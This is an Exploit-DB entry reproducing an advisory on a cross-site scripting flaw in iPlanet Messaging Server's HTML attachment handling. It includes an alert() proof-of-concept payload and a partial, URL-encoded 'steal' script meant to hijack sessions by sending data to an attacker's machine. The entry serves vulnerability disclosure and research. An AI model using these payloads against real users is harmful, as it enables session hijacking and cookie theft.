exploit-db-mirror/exploits/multiple/remote/22662.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

13 lines
No EOL
805 B
Text

source: https://www.securityfocus.com/bid/7704/info
It has been reported that iPlanet Messaging Server may be prone to cross-site scripting attacks. The problem is said to occur while processing HTML attachments received via e-mail. If successfully exploited, a malicious HTML file may be used to steal an unsuspecting users iPlanet Messaging cookies. Other attacks may also be possible.
<html>
<script>alert(document.URL)</script>
</html>
The following script code has been provided to demonstrate indirect session hijacking using web redirection:
function%20steal(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","<URL_to_spoof>",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;
"xmldoc" can be redirected with a "img src", "window.open", to the attacker machine.